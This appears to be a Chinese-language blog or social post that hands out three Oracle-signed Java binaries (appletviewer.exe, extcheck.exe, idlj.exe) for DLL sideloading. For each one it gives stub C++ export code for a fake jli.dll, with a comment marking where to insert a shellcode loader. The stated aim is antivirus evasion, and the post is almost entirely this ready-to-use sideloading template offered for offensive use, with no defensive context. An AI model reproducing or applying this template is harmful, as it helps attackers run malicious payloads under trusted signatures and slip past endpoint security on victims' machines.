之前放出去过一两个白程序,但是现在可能都不免杀了,所以为此再送大家3个白程序,,其实是刚挖的....
回复20240212获取。
均带有签名且正常。
如下:
1.
appletviewer.exe Oracle签名
导出函数:
创建动态链接库,将导出函数复制进去,生成的DLL文件命名为jli.dll
extern "C" __declspec(dllexport) int JLI_CmdToArgs() {
//这里写你的loader或shellcode加载的代码 例如白加黑分离等等
return 0;
}
extern "C" __declspec(dllexport) int JLI_GetStdArgc() {
; return 0;
}
extern "C" __declspec(dllexport) int JLI_MemAlloc() {
return 0;
}
extern "C" __declspec(dllexport) int JLI_GetStdArgs() {
return 0;
}
extern "C" __declspec(dllexport) int JLI_Launch() {
return 0;
}
2.
extcheck.exe Oracle签名
导出函数:
创建动态链接库,将导出函数复制进去,生成的DLL文件命名为jli.dll
extern "C" __declspec(dllexport) int JLI_CmdToArgs() {
//这里写你的loader或shellcode加载的代码 例如白加黑分离等等
return 0;
}
extern "C" __declspec(dllexport) int JLI_GetStdArgc() {
return 0;
}
extern "C" __declspec(dllexport) int JLI_MemAlloc() {
return 0;
}
extern "C" __declspec(dllexport) int JLI_GetStdArgs() {
return 0;
}
extern "C" __declspec(dllexport) int JLI_Launch() {
return 0;
}
3.
idlj.exe Oracle签名
导出函数:
创建动态链接库,将导出函数复制进去,生成的DLL文件命名为jli.dll
extern "C" __declspec(dllexport) int JLI_CmdToArgs() {
//这里写你的loader或shellcode加载的代码 例如白加黑分离等等
return 0;
}
extern "C" __declspec(dllexport) int JLI_GetStdArgc() {
return 0;
}
extern "C" __declspec(dllexport) int JLI_MemAlloc() {
return 0;
}
extern "C" __declspec(dllexport) int JLI_GetStdArgs() {
return 0;
}
extern "C" __declspec(dllexport) int JLI_Launch() {
return 0;
}
最后祝各位师傅新年快乐 红包多多!!!
别忘了转发噢!!!